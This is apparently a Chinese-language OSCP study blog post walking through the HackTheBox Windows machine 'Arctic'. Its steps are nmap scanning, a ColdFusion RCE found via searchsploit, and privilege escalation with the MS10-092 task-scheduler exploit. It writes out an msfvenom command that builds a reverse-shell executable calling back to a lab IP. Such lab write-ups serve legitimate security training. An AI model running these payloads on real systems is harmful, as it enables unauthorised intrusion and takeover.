OSCP备考_0x43_HackThBox靶机_Windows_arctic

Ethan医生4个月前 (07-10)靶场118

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)

searchsploit ADOBE COLDFUSION

查找看看有没有exp

发现一个RCE 测试看看

然后反弹SHELL

提全使用ms10 092

将文件下载下来

同时创建一个反弹shell'

msfvenom -p windows/x64/shellreversetcp LHOST=10.10.16.43 LPORT=7777 -f exe >priv.exe

将这两个都上传到靶机

对了，在上传之前，要修改wsf

将原来的月改为minute ，同时tr后面的跟的定时任务也要指定到咱们priv。exe的路径

回到cmd下

cscript CVE-2010-3338.wsf

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.122.40 (扫描TCP)nmap -sU --top-ports 100 ...

EthanDoctor